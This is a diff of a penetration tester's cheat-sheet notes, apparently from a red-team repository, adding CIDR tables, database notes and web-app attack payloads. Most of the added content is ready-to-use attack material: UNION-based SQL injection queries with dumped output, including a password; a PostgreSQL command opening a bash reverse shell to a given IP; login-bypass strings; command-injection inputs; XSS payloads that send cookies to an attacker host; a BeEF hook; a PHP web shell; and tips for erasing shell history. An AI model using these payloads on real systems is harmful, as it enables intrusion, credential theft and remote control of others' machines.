Added a bunch to notes.

notes/cidr.txt

@@ -1,40 +1,40 @@
-CIDR  Netmask           Networks   Usable IPs
-/1    128.0.0.0	          128 A    2,147,483,646
-/2    192.0.0.0	           64 A    1,073,741,822
-/3    224.0.0.0	           32 A      536,870,910
-/4    240.0.0.0	           16 A      268,435,454
-/5    248.0.0.0	            8 A      134,217,726
-/6    252.0.0.0	            4 A       67,108,862
-/7    254.0.0.0             2 A       33,554,430
-/8    255.0.0.0             1 A       16,777,214
-/9    255.128.0.0	  128 B        8,388,606
-/10   255.192.0.0	   64 B        4,194,302
-/11   255.224.0.0	   32 B        2,097,150
-/12   255.240.0.0	   16 B        1,048,574
-/13   255.248.0.0	    8 B          524,286
-/14   255.252.0.0	    4 B          262,142
-/15   255.254.0.0	    2 B          131,070
-/16   255.255.0.0	    1 B           65,534
-/17   255.255.128.0	  128 C           32,766
-/18   255.255.192.0	   64 C           16,382
-/19   255.255.224.0	   32 C            8,190
-/20   255.255.240.0	   16 C            4,094
-/21   255.255.248.0	    8 C            2,046
-/22   255.255.252.0	    4 C            1,022
-/23   255.255.254.0	    2 C              510
-/24   255.255.255.0	    1 C              254
-/25   255.255.255.128	  1/2 C              126
-/26   255.255.255.192	  1/4 C               62
-/27   255.255.255.224	  1/8 C               30
-/28   255.255.255.240    1/16 C               14
-/29   255.255.255.248    1/32 C                6
-/30   255.255.255.252    1/64 C                2
-/31   255.255.255.254   1/128 C                2
-/32   255.255.255.255   1/256 C                1
+CIDR    Netmask            Networks    Usable IPs
+/1      128.0.0.0             128 A    2,147,483,646
+/2      192.0.0.0              64 A    1,073,741,822
+/3      224.0.0.0              32 A      536,870,910
+/4      240.0.0.0              16 A      268,435,454
+/5      248.0.0.0               8 A      134,217,726
+/6      252.0.0.0               4 A       67,108,862
+/7      254.0.0.0               2 A       33,554,430
+/8      255.0.0.0               1 A       16,777,214
+/9      255.128.0.0           128 B        8,388,606
+/10     255.192.0.0            64 B        4,194,302
+/11     255.224.0.0            32 B        2,097,150
+/12     255.240.0.0            16 B        1,048,574
+/13     255.248.0.0             8 B          524,286
+/14     255.252.0.0             4 B          262,142
+/15     255.254.0.0             2 B          131,070
+/16     255.255.0.0             1 B           65,534
+/17     255.255.128.0         128 C           32,766
+/18     255.255.192.0          64 C           16,382
+/19     255.255.224.0          32 C            8,190
+/20     255.255.240.0          16 C            4,094
+/21     255.255.248.0           8 C            2,046
+/22     255.255.252.0           4 C            1,022
+/23     255.255.254.0           2 C              510
+/24     255.255.255.0           1 C              254
+/25     255.255.255.128       1/2 C              126
+/26     255.255.255.192       1/4 C               62
+/27     255.255.255.224       1/8 C               30
+/28     255.255.255.240      1/16 C               14
+/29     255.255.255.248      1/32 C                6
+/30     255.255.255.252      1/64 C                2
+/31     255.255.255.254    1 /128 C                2
+/32     255.255.255.255    1 /256 C                1
 
 Reserved Networks
-Class   Start         End               Number of IPs   Comment
-A	10.0.0.0      10.255.255.255	16,777,216	A single Class A
-B	172.16.0.0    172.31.255.255	1,048,544	16 contiguous Class Bs
-C	192.168.0.0   192.168.255.255  	65,534	        256 contiguous Class Cs
+Class   Start          End                IPs           Comment
+A       10.0.0.0       10.255.255.255     16,777,216      1 single Class A
+B       172.16.0.0     172.31.255.255      1,048,544     16 contiguous Class Bs
+C       192.168.0.0    192.168.255.255        65,534    256 contiguous Class Cs
 

notes/databases.txt

@@ -70,6 +70,59 @@ SELECT DISTINCT last_name,first_name FROM contacts WHERE first_name IS NOT NULL
 SELECT DISTINCT email FROM contacts WHERE email LIKE "%@target.com" ORDER BY email
 DELETE from profiles WHERE rowid='53';
 UPDATE hostvulns SET tool="Nessus";
+
+# MySQL Injection
+
+# General.
+1 UNION SELECT 1,2,3,4
+1 UNION SELECT NULL,NULL,NULL,@@hostname		ubuntu
+1 UNION SELECT NULL,NULL,NULL,version()			5.7.17-0ubuntu0.16.04.2
+1 UNION SELECT NULL,NULL,NULL,current_user()		root@localhost
+1 UNION SELECT NULL,NULL,NULL,user()			root@localhost
+1 UNION SELECT NULL,NULL,NULL,UUID()			534c63c1-2e4a-11e9-bb88-00505692e5ab
+
+# List all dbs.
+1 UNION SELECT NULL,NULL,NULL,TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES
+	information_schema
+	challenge
+	mysql
+	performance_schema
+	sys
+
+# List current db.
+1 UNION SELECT NULL,NULL,NULL,database()
+	challenge
+
+# List tables in the current db.
+1 UNION SELECT NULL,NULL,NULL,TABLE_NAME FROM information_schema.tables WHERE table_schema=‘challenge’
+	comments
+	users
+
+# List column names in the table ‘comments’.
+1 UNION SELECT NULL,NULL,NULL,CONCAT(TABLE_NAME,0x0A,COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=‘comments’
+	comments id
+	comments username
+	comments comment
+	comments post_date
+
+# List all the data in comments.
+1 UNION SELECT NULL,NULL,NULL,CONCAT(id, 0x0A, username, 0x0A, comment, 0x0A, post_date, 0x0A) FROM comments
+
+# List column names in the table ‘users’.
+1 UNION SELECT NULL,NULL,NULL,CONCAT(TABLE_NAME,0x0A,COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users'
+	users id
+	users username
+	users password
+	users is_admin
+	users signup_date
+	users USER
+	users CURRENT_CONNECTIONS
+        users TOTAL_CONNECTIONS
+
+# List all the data in users.
+1 UNION SELECT NULL,NULL,NULL,CONCAT(username, 0x0A, password) FROM users
+fl4gk33p3r	2DCsG47k5C77X5uMwIwO
+Login > Profile > flag
 ------------------------------------------------------------------------------------------------------
 
 # Postgresql
@@ -103,3 +156,19 @@ openssl s_client -quiet -connect <IP>:<port> | /bin/sh 2>&1 | openssl s_client -
 
 Make sure to `export HISTFILE=/dev/null` when you get on, and `kill -9 $$` when you get off.
 
+# Example
+
+psql -U postgres -h <target IP> platforms
+\c postgres
+create table redteam(data text);
+copy redteam from program 'bash -i >& /dev/tcp/172.16.1.1/4444 0>&1 &';
+------------------------------------------------------------------------------------------------------
+
+# SQL Injection
+
+'+OR+1=1--
+admin’;--
+‘ or 1=1--
+‘ or 2=2--
+‘ or 2-1=1--
+‘ or 2>1--

notes/web-apps.txt

@@ -29,7 +29,7 @@ TRACE     Used for debugging.
 # Browser Redirection
 
 <iframe SRC="http://attackerIP/report" height = "0" width ="0">
-hacker:  use Metasploit browser autopwn listening on hackerip
+hacker:  use Metasploit browser autopwn
 ------------------------------------------------------------------------------------------------------
 
 # Cisco Router
@@ -41,45 +41,59 @@ https://targetIP/level/x/exec/-/show
 # ColdFusion
 
 /CFIDE/administrator/ 
-/debug/cf_debugFr.cfm
 /CFIDE/debug/cf_debugFr.cfm
 /CFIDE/debug/cf_debugFr.cfm?userPage=../../etc/hosts
+/debug/cf_debugFr.cfm
+------------------------------------------------------------------------------------------------------
+
+# Command Injection
+
+<command>; ifconfig
+<command> && ifconfig
+“`/usr/bin/id`”		double quote, back tic, command, back tic, double quote
 ------------------------------------------------------------------------------------------------------
 
 # Cookie Security Issues - missing HttpOnly or Secure attribute
 
 HttpOnly - prevents JavaScript from accessing the cookie
 Secure - only send over an encrypted channel
 
-Firefox
-Cookies > View Cookie Information
+Firefox > Cookies > View Cookie Information
 HttpOnly cookie tells the browser if a Java scripts tries to access the cookie, the browser should not 
-return a value.
+  return a value.
 ------------------------------------------------------------------------------------------------------
 
 # Cookie Stealing
 
+<script>alert(document.cookie)</script>
+
 <script>new Image().src="http://attackerIP/test.php?"+ document.cookie;</script>
-hacker:  nc -lvp 80
+hacker: nc -lvp 80
+------------------------------------------------------------------------------------------------------
+
+# DOM
+
+Document object model
+
+Page Source - pre DOM
+View Selection Source - post DOM
+Inspector - post DOM
 ------------------------------------------------------------------------------------------------------
 
-# File upload vuln
+# File Upload Vuln
 
-Create a php file called evil.php 
+Create a PHP file called evil.php 
 <?php
 $cmd=$_GET["cmd"];
 $decode=base64_decode($cmd);
 os.system($decode);
 ?>
 
 Once the malicious file is in place, pass base64 encoded commands to it, and get basic code execution 
-on the web server, as the "apache" user.
+  on the web server, as the "apache" user.
 
 wget -O output -o /dev/null www.target.com/photos/evil.php?cmd=$(echo id|base64)
-cat output
-
 wget -O output -o /dev/null www.target.com/photos/evil.php?cmd=$(echo ifconfig|base64)
-cat output
 ------------------------------------------------------------------------------------------------------
 
 # Fuzzing
@@ -177,18 +191,75 @@ Ampersand            &foo
 
 # XSS
 
+Injection into the html on the page in a blog:  <h1>test</h1>
+<script>alert(42)</script>
+<script>alert(‘XSS’)</script>
+Try using an HTML entity:  &lt;script&gt:
+
 Stored - example: guestbook
 <script>alert("XSS");</script>
 <script>alert(document.cookie);</script>
 <iframe SRC="http://attackerIP" height="0" width="0"></iframe>
 <script>new Image().src="http://attakerIP/test.php?output="+document.cookie;</script>
 
 curl http://target.com/login.php?user=`perl –e 'print "a" x 500'`
+
+# DOM Based XSS      <img src="x" onerror="alert(42)" />
+# BeEF               <script> src = "http://attackerIP:3000/hook.js"></script>
 ------------------------------------------------------------------------------------------------------
 
-# External How-To
+# Additional Guides
 
 http://bughunting.guide/a-gentle-introduction-to-cross-site-scripting-xss/
 http://bughunting.guide/discovering-xss-vulnerabilities-with-burp-intruder/
 https://nvisium.com/blog/2014/01/31/accurate-xss-detection-with-burpsuite/
 https://forum.bugcrowd.com/t/tutorial-injectx-to-find-xss/790
+------------------------------------------------------------------------------------------------------
+
+# Example Test
+
+Target > Scope > Include in Scope > select your URL > Edit > Host or IP range: remove ^
+
+Manually craw the app
+
+Target > Site map > Content > select all of the lines > RC > Highlight
+
+Spider the app
+
+Run Nikto
+
+Burp > Target > Site map > RC on root folder > Engagement tools > Discover content > Config > Target: check 
+  Directories only, and disable Recurse subdirectories
+Filenames: disable both long names
+Discovery Engine: Sensitive
+	Disable Copy content from suite site map
+	*** must use Burp wordlist, can save setting?
+
+RC on the very first request >  Send to intruder
+Clear
+Put your curser right after the / > click Add
+Payload Sets > Payload type: Runtime file
+Payload Options > Select file: sec lists > Discovery > Web_content > raft-medium-directories
+Start attack
+sort by Status
+	500 	Server message
+	405 	Method not allowed
+
+User-Agent Switcher
+Intruder > clear > select user agent string > Add
+Payload Options > Select file: sec lists > Discovery > Web_content > UserAgents.fuzz.txt
+Sort by Length > Response > Render
+
+Automated Discovery
+Target > Site map > select root folder > Actively scan this host > ??? > sort by URL
+Manually remove duplicates
+
+Test for account lockout
+Payload: Null payload : Generate 100 payloads.
+
+Brute force login
+Cluster bomb - multiple usernames/passwords using all combinations.
+	username - simple list
+	passwords - runtime file
+Sort by Length
+